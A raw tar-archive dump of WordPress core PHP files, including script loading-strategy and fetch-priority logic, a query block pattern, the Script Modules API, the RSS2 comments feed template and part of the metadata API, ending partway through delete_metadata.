* @param string $handle The script handle.
* @param string[]|null $eligible_strategies Optional. The list of strategies to filter. Default null.
* @param array<string, true> $checked Optional. An array of already checked script handles, used to avoid recursive loops.
* @param array<string, string[]> $stored_results Optional. An array of already computed eligible loading strategies by handle, used to increase performance in large dependency lists.
* @return string[] A list of eligible loading strategies that could be used.
*/
private function filter_eligible_strategies( $handle, $eligible_strategies = null, $checked = array(), array &$stored_results = array() ) {
if ( isset( $stored_results[ $handle ] ) ) {
return $stored_results[ $handle ];
}
// If no strategies are being passed, all strategies are eligible.
if ( null === $eligible_strategies ) {
$eligible_strategies = $this->delayed_strategies;
}
// If this handle was already checked, return early.
if ( isset( $checked[ $handle ] ) ) {
return $eligible_strategies;
}
// Mark this handle as checked.
$checked[ $handle ] = true;
// If this handle isn't registered, don't filter anything and return.
if ( ! isset( $this->registered[ $handle ] ) ) {
return $eligible_strategies;
}
// If the handle is not enqueued, don't filter anything and return.
if ( ! $this->query( $handle, 'enqueued' ) ) {
return $eligible_strategies;
}
$is_alias = (bool) ! $this->registered[ $handle ]->src;
$intended_strategy = $this->get_data( $handle, 'strategy' );
// For non-alias handles, an empty intended strategy filters all strategies.
if ( ! $is_alias && empty( $intended_strategy ) ) {
return array();
}
// Handles with inline scripts attached in the 'after' position cannot be delayed.
if ( $this->has_inline_script( $handle, 'after' ) ) {
return array();
}
// If the intended strategy is 'defer', filter out 'async'.
if ( 'defer' === $intended_strategy ) {
$eligible_strategies = array( 'defer' );
}
$dependents = $this->get_dependents( $handle );
// Recursively filter eligible strategies for dependents.
foreach ( $dependents as $dependent ) {
// Bail early once we know the eligible strategy is blocking.
if ( empty( $eligible_strategies ) ) {
return array();
}
$eligible_strategies = $this->filter_eligible_strategies( $dependent, $eligible_strategies, $checked, $stored_results );
}
$stored_results[ $handle ] = $eligible_strategies;
return $eligible_strategies;
}
/**
* Gets the highest fetch priority for a given script and all of its dependent scripts.
*
* @since 6.9.0
* @see self::filter_eligible_strategies()
* @see WP_Script_Modules::get_highest_fetchpriority()
*
* @param string $handle Script module ID.
* @param array<string, true> $checked Optional. An array of already checked script handles, used to avoid recursive loops.
* @param array<string, string> $stored_results Optional. An array of already computed max priority by handle, used to increase performance in large dependency lists.
* @return string|null Highest fetch priority for the script and its dependents.
*/
private function get_highest_fetchpriority_with_dependents( string $handle, array $checked = array(), array &$stored_results = array() ): ?string {
if ( isset( $stored_results[ $handle ] ) ) {
return $stored_results[ $handle ];
}
// If there is a recursive dependency, return early.
if ( isset( $checked[ $handle ] ) ) {
return null;
}
// Mark this handle as checked to guard against infinite recursion.
$checked[ $handle ] = true;
// Abort if the script is not enqueued or a dependency of an enqueued script.
if ( ! $this->query( $handle, 'enqueued' ) ) {
return null;
}
$fetchpriority = $this->get_data( $handle, 'fetchpriority' );
if ( ! $this->is_valid_fetchpriority( $fetchpriority ) ) {
$fetchpriority = 'auto';
}
static $priorities = array(
'low',
'auto',
'high',
);
$high_priority_index = count( $priorities ) - 1;
$highest_priority_index = (int) array_search( $fetchpriority, $priorities, true );
if ( $highest_priority_index !== $high_priority_index ) {
foreach ( $this->get_dependents( $handle ) as $dependent_handle ) {
$dependent_priority = $this->get_highest_fetchpriority_with_dependents( $dependent_handle, $checked, $stored_results );
if ( is_string( $dependent_priority ) ) {
$highest_priority_index = max(
$highest_priority_index,
(int) array_search( $dependent_priority, $priorities, true )
);
if ( $highest_priority_index === $high_priority_index ) {
break;
}
}
}
}
$stored_results[ $handle ] = $priorities[ $highest_priority_index ]; // @phpstan-ignore parameterByRef.type (We know the index is valid and that this will be a string.)
return $priorities[ $highest_priority_index ];
}
/**
* Gets data for inline scripts registered for a specific handle.
*
* @since 6.3.0
*
* @param string $handle Name of the script to get data for. Must be lowercase.
* @param string $position The position of the inline script.
* @return bool Whether the handle has an inline script (either before or after).
*/
private function has_inline_script( $handle, $position = null ) {
if ( $position && in_array( $position, array( 'before', 'after' ), true ) ) {
return (bool) $this->get_data( $handle, $position );
}
return (bool) ( $this->get_data( $handle, 'before' ) || $this->get_data( $handle, 'after' ) );
}
/**
* Resets class properties.
*
* @since 2.8.0
*/
public function reset() {
$this->do_concat = false;
$this->print_code = '';
$this->concat = '';
$this->concat_version = '';
$this->print_html = '';
$this->ext_version = '';
$this->ext_handles = '';
}
/**
* Gets a script-specific dependency warning message.
*
* @since 6.9.1
*
* @param string $handle Script handle with missing dependencies.
* @param string[] $missing_dependency_handles Missing dependency handles.
* @return string Formatted, localized warning message.
*/
protected function get_dependency_warning_message( $handle, $missing_dependency_handles ) {
return sprintf(
/* translators: 1: Script handle, 2: List of missing dependency handles. */
__( 'The script with the handle "%1$s" was enqueued with dependencies that are not registered: %2$s.' ),
$handle,
implode( wp_get_list_item_separator(), $missing_dependency_handles )
);
}
}
query-medium-posts-20260621104428.php 0000666 00000002035 15224151220 0012427 0 ustar 00 <?php
/**
* Query: Image at left.
*
* @package WordPress
*/
return array(
'title' => _x( 'Image at left', 'Block pattern title' ),
'blockTypes' => array( 'core/query' ),
'categories' => array( 'query' ),
'content' => '<!-- wp:query {"query":{"perPage":3,"pages":0,"offset":0,"postType":"post","order":"desc","orderBy":"date","author":"","search":"","exclude":[],"sticky":"","inherit":false}} -->
<div class="wp-block-query">
<!-- wp:post-template -->
<!-- wp:columns {"align":"wide"} -->
<div class="wp-block-columns alignwide"><!-- wp:column {"width":"66.66%"} -->
<div class="wp-block-column" style="flex-basis:66.66%"><!-- wp:post-featured-image {"isLink":true} /--></div>
<!-- /wp:column -->
<!-- wp:column {"width":"33.33%"} -->
<div class="wp-block-column" style="flex-basis:33.33%"><!-- wp:post-title {"isLink":true} /-->
<!-- wp:post-excerpt /--></div>
<!-- /wp:column --></div>
<!-- /wp:columns -->
<!-- /wp:post-template -->
</div>
<!-- /wp:query -->',
);
script-modules-20260621093250.php 0000666 00000023267 15224151220 0011622 0 ustar 00 <?php
/**
* Script Modules API: Script Module functions
*
* @since 6.5.0
*
* @package WordPress
* @subpackage Script Modules
*/
/**
* Retrieves the main WP_Script_Modules instance.
*
* This function provides access to the WP_Script_Modules instance, creating one
* if it doesn't exist yet.
*
* @since 6.5.0
*
* @global WP_Script_Modules $wp_script_modules
*
* @return WP_Script_Modules The main WP_Script_Modules instance.
*/
function wp_script_modules(): WP_Script_Modules {
global $wp_script_modules;
if ( ! ( $wp_script_modules instanceof WP_Script_Modules ) ) {
$wp_script_modules = new WP_Script_Modules();
}
return $wp_script_modules;
}
/**
* Registers the script module if no script module with that script module
* identifier has already been registered.
*
* @since 6.5.0
* @since 6.9.0 Added the $args parameter.
*
* @param string $id The identifier of the script module. Should be unique. It will be used in the
* final import map.
* @param string $src Optional. Full URL of the script module, or path of the script module relative
* to the WordPress root directory. If it is provided and the script module has
* not been registered yet, it will be registered.
* @param array $deps {
* Optional. List of dependencies.
*
* @type string|array ...$0 {
* An array of script module identifiers of the dependencies of this script
* module. The dependencies can be strings or arrays. If they are arrays,
* they need an `id` key with the script module identifier, and can contain
* an `import` key with either `static` or `dynamic`. By default,
* dependencies that don't contain an `import` key are considered static.
*
* @type string $id The script module identifier.
* @type string $import Optional. Import type. May be either `static` or
* `dynamic`. Defaults to `static`.
* }
* }
* @param string|false|null $version Optional. String specifying the script module version number. Defaults to false.
* It is added to the URL as a query string for cache busting purposes. If $version
* is set to false, the version number is the currently installed WordPress version.
* If $version is set to null, no version is added.
* @param array $args {
* Optional. An array of additional args. Default empty array.
*
* @type bool $in_footer Whether to print the script module in the footer. Only relevant to block themes. Default 'false'. Optional.
* @type 'auto'|'low'|'high' $fetchpriority Fetch priority. Default 'auto'. Optional.
* }
*/
function wp_register_script_module( string $id, string $src, array $deps = array(), $version = false, array $args = array() ) {
wp_script_modules()->register( $id, $src, $deps, $version, $args );
}
/**
* Marks the script module to be enqueued in the page.
*
* If a src is provided and the script module has not been registered yet, it
* will be registered.
*
* @since 6.5.0
* @since 6.9.0 Added the $args parameter.
*
* @param string $id The identifier of the script module. Should be unique. It will be used in the
* final import map.
* @param string $src Optional. Full URL of the script module, or path of the script module relative
* to the WordPress root directory. If it is provided and the script module has
* not been registered yet, it will be registered.
* @param array $deps {
* Optional. List of dependencies.
*
* @type string|array ...$0 {
* An array of script module identifiers of the dependencies of this script
* module. The dependencies can be strings or arrays. If they are arrays,
* they need an `id` key with the script module identifier, and can contain
* an `import` key with either `static` or `dynamic`. By default,
* dependencies that don't contain an `import` key are considered static.
*
* @type string $id The script module identifier.
* @type string $import Optional. Import type. May be either `static` or
* `dynamic`. Defaults to `static`.
* }
* }
* @param string|false|null $version Optional. String specifying the script module version number. Defaults to false.
* It is added to the URL as a query string for cache busting purposes. If $version
* is set to false, the version number is the currently installed WordPress version.
* If $version is set to null, no version is added.
* @param array $args {
* Optional. An array of additional args. Default empty array.
*
* @type bool $in_footer Whether to print the script module in the footer. Only relevant to block themes. Default 'false'. Optional.
* @type 'auto'|'low'|'high' $fetchpriority Fetch priority. Default 'auto'. Optional.
* }
*/
function wp_enqueue_script_module( string $id, string $src = '', array $deps = array(), $version = false, array $args = array() ) {
wp_script_modules()->enqueue( $id, $src, $deps, $version, $args );
}
/**
* Unmarks the script module so it is no longer enqueued in the page.
*
* @since 6.5.0
*
* @param string $id The identifier of the script module.
*/
function wp_dequeue_script_module( string $id ) {
wp_script_modules()->dequeue( $id );
}
/**
* Deregisters the script module.
*
* @since 6.5.0
*
* @param string $id The identifier of the script module.
*/
function wp_deregister_script_module( string $id ) {
wp_script_modules()->deregister( $id );
}
/**
* Registers all the default WordPress Script Modules.
*
* @since 6.7.0
*/
function wp_default_script_modules() {
$suffix = defined( 'WP_RUN_CORE_TESTS' ) ? '.min' : wp_scripts_get_suffix();
/*
* Expects multidimensional array like:
*
* 'interactivity/index.min.js' => array('dependencies' => array(…), 'version' => '…'),
* 'interactivity/debug.min.js' => array('dependencies' => array(…), 'version' => '…'),
* 'interactivity-router/index.min.js' => …
*/
$assets = include ABSPATH . WPINC . "/assets/script-modules-packages{$suffix}.php";
foreach ( $assets as $file_name => $script_module_data ) {
/*
* Build the WordPress Script Module ID from the file name.
* Prepend `@wordpress/` and remove extensions and `/index` if present:
* - interactivity/index.min.js => @wordpress/interactivity
* - interactivity/debug.min.js => @wordpress/interactivity/debug
* - block-library/query/view.js => @wordpress/block-library/query/view
*/
$script_module_id = '@wordpress/' . preg_replace( '~(?:/index)?(?:\.min)?\.js$~D', '', $file_name, 1 );
switch ( $script_module_id ) {
/*
* Interactivity exposes two entrypoints, "/index" and "/debug".
* "/debug" should replace "/index" in development.
*/
case '@wordpress/interactivity/debug':
if ( ! SCRIPT_DEBUG ) {
continue 2;
}
$script_module_id = '@wordpress/interactivity';
break;
case '@wordpress/interactivity':
if ( SCRIPT_DEBUG ) {
continue 2;
}
break;
}
/*
* The Interactivity API is designed with server-side rendering as its primary goal, so all of its script modules
* should be loaded with low fetchpriority and printed in the footer since they should not be needed in the
* critical rendering path. Also, the @wordpress/a11y script module is intended to be used as a dynamic import
* dependency, in which case the fetchpriority is irrelevant. See <https://make.wordpress.org/core/2024/10/14/updates-to-script-modules-in-6-7/>.
* However, in case it is added as a static import dependency, the fetchpriority is explicitly set to be 'low'
* since the module should not be involved in the critical rendering path, and if it is, its fetchpriority will
* be bumped to match the fetchpriority of the dependent script.
*/
$args = array();
if (
str_starts_with( $script_module_id, '@wordpress/interactivity' ) ||
str_starts_with( $script_module_id, '@wordpress/block-library' ) ||
'@wordpress/a11y' === $script_module_id
) {
$args['fetchpriority'] = 'low';
$args['in_footer'] = true;
}
// Marks all Core blocks as compatible with client-side navigation.
if ( str_starts_with( $script_module_id, '@wordpress/block-library' ) ) {
wp_interactivity()->add_client_navigation_support_to_script_module( $script_module_id );
}
$path = includes_url( "js/dist/script-modules/{$file_name}" );
wp_register_script_module( $script_module_id, $path, $script_module_data['dependencies'], $script_module_data['version'], $args );
}
}
feed-rss2-comments.php 0000666 00000010050 15224151220 0010664 0 ustar 00 <?php
/**
* RSS2 Feed Template for displaying RSS2 Comments feed.
*
* @package WordPress
*/
header( 'Content-Type: ' . feed_content_type( 'rss2' ) . '; charset=' . get_option( 'blog_charset' ), true );
echo '<?xml version="1.0" encoding="' . get_option( 'blog_charset' ) . '"?' . '>';
/** This action is documented in wp-includes/feed-rss2.php */
do_action( 'rss_tag_pre', 'rss2-comments' );
?>
<rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
<?php
/** This action is documented in wp-includes/feed-rss2.php */
do_action( 'rss2_ns' );
?>
<?php
/**
* Fires at the end of the RSS root to add namespaces.
*
* @since 2.8.0
*/
do_action( 'rss2_comments_ns' );
?>
>
<channel>
<title>
<?php
if ( is_singular() ) {
/* translators: Comments feed title. %s: Post title. */
printf( ent2ncr( __( 'Comments on: %s' ) ), get_the_title_rss() );
} elseif ( is_search() ) {
/* translators: Comments feed title. 1: Site title, 2: Search query. */
printf( ent2ncr( __( 'Comments for %1$s searching on %2$s' ) ), get_bloginfo_rss( 'name' ), get_search_query() );
} else {
/* translators: Comments feed title. %s: Site title. */
printf( ent2ncr( __( 'Comments for %s' ) ), get_wp_title_rss() );
}
?>
</title>
<atom:link href="<?php self_link(); ?>" rel="self" type="application/rss+xml" />
<link><?php ( is_single() ) ? the_permalink_rss() : bloginfo_rss( 'url' ); ?></link>
<description><?php bloginfo_rss( 'description' ); ?></description>
<lastBuildDate><?php echo get_feed_build_date( 'r' ); ?></lastBuildDate>
<sy:updatePeriod>
<?php
/** This filter is documented in wp-includes/feed-rss2.php */
echo apply_filters( 'rss_update_period', 'hourly' );
?>
</sy:updatePeriod>
<sy:updateFrequency>
<?php
/** This filter is documented in wp-includes/feed-rss2.php */
echo apply_filters( 'rss_update_frequency', '1' );
?>
</sy:updateFrequency>
<?php
/**
* Fires at the end of the RSS2 comment feed header.
*
* @since 2.3.0
*/
do_action( 'commentsrss2_head' );
while ( have_comments() ) :
the_comment();
$comment_post = get_post( $comment->comment_post_ID );
/**
* @global WP_Post $post Global post object.
*/
$GLOBALS['post'] = $comment_post;
?>
<item>
<title>
<?php
if ( ! is_singular() ) {
$title = get_the_title( $comment_post->ID );
/** This filter is documented in wp-includes/feed.php */
$title = apply_filters( 'the_title_rss', $title );
/* translators: Individual comment title. 1: Post title, 2: Comment author name. */
printf( ent2ncr( __( 'Comment on %1$s by %2$s' ) ), $title, get_comment_author_rss() );
} else {
/* translators: Comment author title. %s: Comment author name. */
printf( ent2ncr( __( 'By: %s' ) ), get_comment_author_rss() );
}
?>
</title>
<link><?php comment_link(); ?></link>
<dc:creator><![CDATA[<?php echo get_comment_author_rss(); ?>]]></dc:creator>
<pubDate><?php echo mysql2date( 'D, d M Y H:i:s +0000', get_comment_time( 'Y-m-d H:i:s', true, false ), false ); ?></pubDate>
<guid isPermaLink="false"><?php comment_guid(); ?></guid>
<?php if ( post_password_required( $comment_post ) ) : ?>
<description><?php echo ent2ncr( __( 'Protected Comments: Please enter your password to view comments.' ) ); ?></description>
<content:encoded><![CDATA[<?php echo get_the_password_form(); ?>]]></content:encoded>
<?php else : ?>
<description><![CDATA[<?php comment_text_rss(); ?>]]></description>
<content:encoded><![CDATA[<?php comment_text(); ?>]]></content:encoded>
<?php endif; // End if post_password_required(). ?>
<?php
/**
* Fires at the end of each RSS2 comment feed item.
*
* @since 2.1.0
*
* @param int $comment_id The ID of the comment being displayed.
* @param int $comment_post_id The ID of the post the comment is connected to.
*/
do_action( 'commentrss2_item', $comment->comment_ID, $comment_post->ID );
?>
</item>
<?php endwhile; ?>
</channel>
</rss>
meta.php 0000666 00000201774 15224151220 0006214 0 ustar 00 <?php
/**
* Core Metadata API
*
* Functions for retrieving and manipulating metadata of various WordPress object types. Metadata
* for an object is a represented by a simple key-value pair. Objects may contain multiple
* metadata entries that share the same key and differ only in their value.
*
* @package WordPress
* @subpackage Meta
*/
require ABSPATH . WPINC . '/class-wp-metadata-lazyloader.php';
/**
* Adds metadata for the specified object.
*
* For historical reasons both the meta key and the meta value are expected to be "slashed" (slashes escaped) on input.
*
* @since 2.9.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $meta_value Metadata value. Arrays and objects are stored as serialized data and
* will be returned as the same type when retrieved. Other data types will
* be stored as strings in the database:
* - false is stored and retrieved as an empty string ('')
* - true is stored and retrieved as '1'
* - numbers (both integer and float) are stored and retrieved as strings
* Must be serializable if non-scalar.
* @param bool $unique Optional. Whether the specified metadata key should be unique for the object.
* If true, and the object already has a value for the specified metadata key,
* no change will be made. Default false.
* @return int|false The meta ID on success, false on failure.
*/
function add_metadata( $meta_type, $object_id, $meta_key, $meta_value, $unique = false ) {
global $wpdb;
if ( ! $meta_type || ! $meta_key || ! is_numeric( $object_id ) ) {
return false;
}
$object_id = absint( $object_id );
if ( ! $object_id ) {
return false;
}
$table = _get_meta_table( $meta_type );
if ( ! $table ) {
return false;
}
$meta_subtype = get_object_subtype( $meta_type, $object_id );
$column = sanitize_key( $meta_type . '_id' );
// expected_slashed ($meta_key)
$meta_key = wp_unslash( $meta_key );
$meta_value = wp_unslash( $meta_value );
$meta_value = sanitize_meta( $meta_key, $meta_value, $meta_type, $meta_subtype );
/**
* Short-circuits adding metadata of a specific type.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
* Returning a non-null value will effectively short-circuit the function.
*
* Possible hook names include:
*
* - `add_blog_metadata`
* - `add_post_metadata`
* - `add_comment_metadata`
* - `add_term_metadata`
* - `add_user_metadata`
*
* @since 3.1.0
*
* @param null|int|false $check Whether to allow adding metadata for the given type. Return false or a meta ID
* to short-circuit the function. Return null to continue with the default behavior.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $meta_value Metadata value. Must be serializable if non-scalar.
* @param bool $unique Whether the specified meta key should be unique for the object.
*/
$check = apply_filters( "add_{$meta_type}_metadata", null, $object_id, $meta_key, $meta_value, $unique );
if ( null !== $check ) {
return $check;
}
if ( $unique && $wpdb->get_var(
$wpdb->prepare(
"SELECT COUNT(*) FROM $table WHERE meta_key = %s AND $column = %d",
$meta_key,
$object_id
)
) ) {
return false;
}
$_meta_value = $meta_value;
$meta_value = maybe_serialize( $meta_value );
/**
* Fires immediately before meta of a specific type is added.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
*
* Possible hook names include:
*
* - `add_blog_meta`
* - `add_post_meta`
* - `add_comment_meta`
* - `add_term_meta`
* - `add_user_meta`
*
* @since 3.1.0
*
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $_meta_value Metadata value.
*/
do_action( "add_{$meta_type}_meta", $object_id, $meta_key, $_meta_value );
$result = $wpdb->insert(
$table,
array(
$column => $object_id,
'meta_key' => $meta_key,
'meta_value' => $meta_value,
)
);
if ( ! $result ) {
return false;
}
$mid = (int) $wpdb->insert_id;
wp_cache_delete( $object_id, $meta_type . '_meta' );
/**
* Fires immediately after meta of a specific type is added.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
*
* Possible hook names include:
*
* - `added_blog_meta`
* - `added_post_meta`
* - `added_comment_meta`
* - `added_term_meta`
* - `added_user_meta`
*
* @since 2.9.0
*
* @param int $mid The meta ID after successful update.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $_meta_value Metadata value.
*/
do_action( "added_{$meta_type}_meta", $mid, $object_id, $meta_key, $_meta_value );
return $mid;
}
/**
* Updates metadata for the specified object. If no value already exists for the specified object
* ID and metadata key, the metadata will be added.
*
* For historical reasons both the meta key and the meta value are expected to be "slashed" (slashes escaped) on input.
*
* @since 2.9.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $meta_value Metadata value. Must be serializable if non-scalar.
* @param mixed $prev_value Optional. Previous value to check before updating.
* If specified, only update existing metadata entries with
* this value. Otherwise, update all entries. Default empty string.
* @return int|bool The new meta field ID if a field with the given key didn't exist
* and was therefore added, true on successful update,
* false on failure or if the value passed to the function
* is the same as the one that is already in the database.
*/
function update_metadata( $meta_type, $object_id, $meta_key, $meta_value, $prev_value = '' ) {
global $wpdb;
if ( ! $meta_type || ! $meta_key || ! is_numeric( $object_id ) ) {
return false;
}
$object_id = absint( $object_id );
if ( ! $object_id ) {
return false;
}
$table = _get_meta_table( $meta_type );
if ( ! $table ) {
return false;
}
$meta_subtype = get_object_subtype( $meta_type, $object_id );
$column = sanitize_key( $meta_type . '_id' );
$id_column = ( 'user' === $meta_type ) ? 'umeta_id' : 'meta_id';
// expected_slashed ($meta_key)
$raw_meta_key = $meta_key;
$meta_key = wp_unslash( $meta_key );
$passed_value = $meta_value;
$meta_value = wp_unslash( $meta_value );
$meta_value = sanitize_meta( $meta_key, $meta_value, $meta_type, $meta_subtype );
/**
* Short-circuits updating metadata of a specific type.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
* Returning a non-null value will effectively short-circuit the function.
*
* Possible hook names include:
*
* - `update_blog_metadata`
* - `update_post_metadata`
* - `update_comment_metadata`
* - `update_term_metadata`
* - `update_user_metadata`
*
* @since 3.1.0
*
* @param null|bool $check Whether to allow updating metadata for the given type.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $meta_value Metadata value. Must be serializable if non-scalar.
* @param mixed $prev_value Optional. Previous value to check before updating.
* If specified, only update existing metadata entries with
* this value. Otherwise, update all entries.
*/
$check = apply_filters( "update_{$meta_type}_metadata", null, $object_id, $meta_key, $meta_value, $prev_value );
if ( null !== $check ) {
return (bool) $check;
}
// Compare existing value to new value if no prev value given and the key exists only once.
if ( empty( $prev_value ) ) {
$old_value = get_metadata_raw( $meta_type, $object_id, $meta_key );
if ( is_countable( $old_value ) && count( $old_value ) === 1 ) {
if ( $old_value[0] === $meta_value ) {
return false;
}
}
}
$meta_ids = $wpdb->get_col( $wpdb->prepare( "SELECT $id_column FROM $table WHERE meta_key = %s AND $column = %d", $meta_key, $object_id ) );
if ( empty( $meta_ids ) ) {
return add_metadata( $meta_type, $object_id, $raw_meta_key, $passed_value );
}
$_meta_value = $meta_value;
$meta_value = maybe_serialize( $meta_value );
$data = compact( 'meta_value' );
$where = array(
$column => $object_id,
'meta_key' => $meta_key,
);
if ( ! empty( $prev_value ) ) {
$prev_value = maybe_serialize( $prev_value );
$where['meta_value'] = $prev_value;
}
foreach ( $meta_ids as $meta_id ) {
/**
* Fires immediately before updating metadata of a specific type.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
*
* Possible hook names include:
*
* - `update_blog_meta`
* - `update_post_meta`
* - `update_comment_meta`
* - `update_term_meta`
* - `update_user_meta`
*
* @since 2.9.0
*
* @param int $meta_id ID of the metadata entry to update.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $_meta_value Metadata value.
*/
do_action( "update_{$meta_type}_meta", $meta_id, $object_id, $meta_key, $_meta_value );
if ( 'post' === $meta_type ) {
/**
* Fires immediately before updating a post's metadata.
*
* @since 2.9.0
*
* @param int $meta_id ID of metadata entry to update.
* @param int $object_id Post ID.
* @param string $meta_key Metadata key.
* @param mixed $meta_value Metadata value. This will be a PHP-serialized string representation of the value
* if the value is an array, an object, or itself a PHP-serialized string.
*/
do_action( 'update_postmeta', $meta_id, $object_id, $meta_key, $meta_value );
}
}
$result = $wpdb->update( $table, $data, $where );
if ( ! $result ) {
return false;
}
wp_cache_delete( $object_id, $meta_type . '_meta' );
foreach ( $meta_ids as $meta_id ) {
/**
* Fires immediately after updating metadata of a specific type.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
*
* Possible hook names include:
*
* - `updated_blog_meta`
* - `updated_post_meta`
* - `updated_comment_meta`
* - `updated_term_meta`
* - `updated_user_meta`
*
* @since 2.9.0
*
* @param int $meta_id ID of updated metadata entry.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $_meta_value Metadata value.
*/
do_action( "updated_{$meta_type}_meta", $meta_id, $object_id, $meta_key, $_meta_value );
if ( 'post' === $meta_type ) {
/**
* Fires immediately after updating a post's metadata.
*
* @since 2.9.0
*
* @param int $meta_id ID of updated metadata entry.
* @param int $object_id Post ID.
* @param string $meta_key Metadata key.
* @param mixed $meta_value Metadata value. This will be a PHP-serialized string representation of the value
* if the value is an array, an object, or itself a PHP-serialized string.
*/
do_action( 'updated_postmeta', $meta_id, $object_id, $meta_key, $meta_value );
}
}
return true;
}
/**
* Deletes metadata for the specified object.
*
* For historical reasons both the meta key and the meta value are expected to be "slashed" (slashes escaped) on input.
*
* @since 2.9.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $meta_value Optional. Metadata value. Must be serializable if non-scalar.
* If specified, only delete metadata entries with this value.
* Otherwise, delete all entries with the specified meta_key.
* Pass `null`, `false`, or an empty string to skip this check.
* (For backward compatibility, it is not possible to pass an empty string
* to delete those entries with an empty string for a value.)
* Default empty string.
* @param bool $delete_all Optional. If true, delete matching metadata entries for all objects,
* ignoring the specified object_id. Otherwise, only delete
* matching metadata entries for the specified object_id. Default false.
* @return bool True on successful delete, false on failure.
*/
function delete_metadata( $meta_type, $object_id, $meta_key, $meta_value = '', $delete_all = false ) {
global $wpdb;
if ( ! $meta_type || ! $meta_key || ! is_numeric( $object_id ) && ! $delete_all ) {
return false;
}
$object_id = absint( $object_id );
if ( ! $object_id && ! $delete_all ) {
return false;
}
$table = _get_meta_table( $meta_type );
if ( ! $table ) {
return false;
}
$type_column = sanitize_key( $meta_type . '_id' );
$id_column = ( 'user' === $meta_type ) ? 'umeta_id' : 'meta_id';
// expected_slashed ($meta_key)
$meta_key = wp_unslash( $meta_key );
$meta_value = wp_unslash( $meta_value );
/**
* Short-circuits deleting metadata of a specific type.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
* Returning a non-null value will effectively short-circuit the function.
*
* Possible hook names include:
*
* - `delete_blog_metadata`
* - `delete_post_metadata`
* - `delete_comment_metadata`
* - `delete_term_metadata`
* - `delete_user_metadata`
*
* @since 3.1.0
*
* @param null|bool $delete Whether to allow metadata deletion of the given type.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $meta_value Metadata value. Must be serializable if non-scalar.
* @param bool $delete_all Whether to delete the matching metadata entries
* for all objects, ignoring the specified $object_id.
* Default false.
*/
$check = apply_filters( "delete_{$meta_type}_metadata", null, $object_id, $meta_key, $meta_value, $delete_all );
if ( null !== $check ) {
return (bool) $check;
}
$_meta_value = $meta_value;
$meta_value = maybe_serialize( $meta_value );
$query = $wpdb->prepare( "SELECT $id_column FROM $table WHERE meta_key = %s", $meta_key );
if ( ! $delete_all ) {
$query .= $wpdb->prepare( " AND $type_column = %d", $object_id );
}
if ( '' !== $meta_value && null !== $meta_value && false !== $meta_value ) {
$query .= $wpdb->prepare( ' AND meta_value = %s', $meta_value );
}
$meta_ids = $wpdb->get_col( $query );
if ( ! count( $meta_ids ) ) {
return false;
}
if ( $delete_all ) {
if ( '' !== $meta_value && null !== $meta_value && false !== $meta_value ) {
$object_ids = $wpdb->get_col( $wpdb->prepare( "SELECT $type_column FROM $table WHERE meta_key = %s AND meta_value = %s", $meta_key, $meta_value ) );
} else {
$object_ids = $wpdb->get_col( $wpdb->prepare( "SELECT $type_column FROM $table WHERE meta_key = %s", $meta_key ) );
}
}
/**
* Fires immediately before deleting metadata of a specific type.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
*
* Possible hook names include:
*
* - `delete_blog_meta`
* - `delete_post_meta`
* - `delete_comment_meta`
* - `delete_term_meta`
* - `delete_user_meta`
*
* @since 3.1.0
*
* @param string[] $meta_ids An array of metadata entry IDs to delete.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $_meta_value Metadata value.
*/
do_action( "delete_{$meta_type}_meta", $meta_ids, $object_id, $meta_key, $_meta_value );
// Old-style action.
if ( 'post' === $meta_type ) {
/**
* Fires immediately before deleting metadata for a post.
*
* @since 2.9.0
*
* @param string[] $meta_ids An array of metadata entry IDs to delete.
*/
do_action( 'delete_postmeta', $meta_ids );
}
$query = "DELETE FROM $table WHERE $id_column IN( " . implode( ',', $meta_ids ) . ' )';
$count = $wpdb->query( $query );
if ( ! $count ) {
return false;
}
if ( $delete_all ) {
$data = (array) $object_ids;
} else {
$data = array( $object_id );
}
wp_cache_delete_multiple( $data, $meta_type . '_meta' );
/**
* Fires immediately after deleting metadata of a specific type.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
